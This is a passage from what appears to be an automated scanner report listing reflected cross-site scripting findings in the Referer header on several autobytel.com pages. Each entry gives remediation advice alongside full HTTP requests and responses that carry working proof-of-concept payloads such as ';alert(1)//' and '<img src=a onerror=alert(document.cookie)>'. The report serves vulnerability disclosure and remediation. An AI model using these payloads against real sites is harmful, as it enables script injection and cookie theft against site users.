Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=913d2"%3balert(1)//030d163c2c3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 22248
Expires: Mon, 24 Jan 2011 23:54:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:04 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:04 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E913d2%22%3Balert%281%29%2F%2F030d163c2c3;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~913d2";alert(1)//030d163c2c3";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "487A91E6-0EE4-A9FC-119723D4
...[SNIP]...

4.1953. http://www.autobytel.com/my-garage.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca510"%3balert(1)//6d1000ff8b8 was submitted in the Referer HTTP header. This input was echoed as ca510";alert(1)//6d1000ff8b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=ca510"%3balert(1)//6d1000ff8b8

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:30 GMT
Content-Length: 22126
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:30 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Eca510%22%3Balert%281%29%2F%2F6d1000ff8b8;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~ca510";alert(1)//6d1000ff8b8";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4887B1AF-F9A2-1895-65F5E323
...[SNIP]...

4.1954. http://www.autobytel.com/my-garage.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 7aff0--><img%20src%3da%20onerror%3dalert(1)>4f750af4e81 was submitted in the Referer HTTP header. This input was echoed as 7aff0--><img src=a onerror=alert(1)>4f750af4e81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=7aff0--><img%20src%3da%20onerror%3dalert(1)>4f750af4e81

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:43 GMT
Content-Length: 22164
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E7aff0%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E4f750af4e81;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 7aff0--><img src=a onerror=alert(1)>4f750af4e81 -->
...[SNIP]...

4.1955. http://www.autobytel.com/new-car-price-quotes.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-car-price-quotes.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6951a"%3balert(1)//ac31482b0ba was submitted in the Referer HTTP header. This input was echoed as 6951a";alert(1)//ac31482b0ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /new-car-price-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=6951a"%3balert(1)//ac31482b0ba

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:56:46 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E6951a%22%3Balert%281%29%2F%2Fac31482b0ba;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62723


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~6951a";alert(1)//ac31482b0ba";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48933F96-0C12-2A9C-5A69CBDA
...[SNIP]...

4.1956. http://www.autobytel.com/new-car-price-quotes.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-car-price-quotes.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 7ce62--><img%20src%3da%20onerror%3dalert(1)>17e96f6cd8f was submitted in the Referer HTTP header. This input was echoed as 7ce62--><img src=a onerror=alert(1)>17e96f6cd8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-car-price-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=7ce62--><img%20src%3da%20onerror%3dalert(1)>17e96f6cd8f

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:04 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:04 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E7ce62%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E17e96f6cd8f;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 7ce62--><img src=a onerror=alert(1)>17e96f6cd8f -->
...[SNIP]...

4.1957. http://www.autobytel.com/new-cars.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-cars.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86efc"%3balert(1)//865d083b25d was submitted in the Referer HTTP header. This input was echoed as 86efc";alert(1)//865d083b25d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /new-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=86efc"%3balert(1)//865d083b25d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:36 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:36 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E86efc%22%3Balert%281%29%2F%2F865d083b25d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104164


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~86efc";alert(1)//865d083b25d";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48763ED0-9974-8E7A-7E0212FF
...[SNIP]...

4.1958. http://www.autobytel.com/new-cars.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-cars.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b6cf3--><img%20src%3da%20onerror%3dalert(1)>3dd5f85e0a7 was submitted in the Referer HTTP header. This input was echoed as b6cf3--><img src=a onerror=alert(1)>3dd5f85e0a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=b6cf3--><img%20src%3da%20onerror%3dalert(1)>3dd5f85e0a7

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:00 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Eb6cf3%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E3dd5f85e0a7;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104202


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: b6cf3--><img src=a onerror=alert(1)>3dd5f85e0a7 -->
...[SNIP]...

4.1959. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /repair-cost-calculator/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 846fe"%3balert(1)//69680248ec0 was submitted in the Referer HTTP header. This input was echoed as 846fe";alert(1)//69680248ec0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /repair-cost-calculator/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=846fe"%3balert(1)//69680248ec0

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:22 GMT
Content-Length: 22275
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:21 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E846fe%22%3Balert%281%29%2F%2F69680248ec0;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~846fe";alert(1)//69680248ec0";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48866FE0-D0B9-66CE-6C71FAD1
...[SNIP]...

4.1960. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /repair-cost-calculator/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 7594a--><img%20src%3da%20onerror%3dalert(1)>fe2c7a68223 was submitted in the Referer HTTP header. This input was echoed as 7594a--><img src=a onerror=alert(1)>fe2c7a68223 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /repair-cost-calculator/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=7594a--><img%20src%3da%20onerror%3dalert(1)>fe2c7a68223

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:28 GMT
Content-Length: 22313
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E7594a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Efe2c7a68223;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
